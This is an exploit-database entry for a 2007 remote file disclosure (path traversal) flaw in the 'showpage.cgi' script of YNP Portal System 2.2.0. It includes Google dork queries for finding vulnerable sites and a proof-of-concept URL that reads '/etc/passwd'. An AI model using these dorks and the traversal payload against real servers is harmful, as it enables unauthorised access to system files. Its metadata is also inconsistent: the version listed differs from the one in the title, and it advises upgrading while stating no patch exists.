header-logo
Suggest Exploit
vendor:
YNP Portal System
by:
GolD_M = [Mahmood_ali]
7.5
CVSS
HIGH
Remote File Disclosure
200
CWE
Product Name: YNP Portal System
Affected Version From: 2.2.2000
Affected Version To: 2.2.2000
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

YNP Portal System 2.2.0 Remote File Disclosure Vulnerability

The YNP Portal System version 2.2.0 is vulnerable to remote file disclosure. This allows an attacker to access sensitive files on the server by exploiting the 'showpage.cgi' script. By manipulating the 'p' parameter in the URL, an attacker can disclose files outside the web root directory, such as the '/etc/passwd' file.

Mitigation:

Upgrade to a patched version of the YNP Portal System.
Source

Exploit-DB raw data:

#################################################################################
# YNP Portal System 2.2.0 (showpage.cgi p) Remote File Disclosure Vulnerability #
# D0RK : inurl:"showpage.cgi?p=popsearch.html"                               #
#      : inurl:"showpage.cgi?p=support.html"                                 #
#      : inurl:"showpage.cgi?p=dialup.html"                                  #
#      : inurl:"showpage.cgi?p="                                             #
# POC: http://xxxx.com/showpage.cgi?p=../../../../../../etc/passwd           #
# Discovered by: GolD_M = [Mahmood_ali]                                      #
# Thanx To : Tryag-Team & Asbmay's Group & bd0rk & Cold Zero & All My Friends   #
#################################################################################

# milw0rm.com [2007-08-06]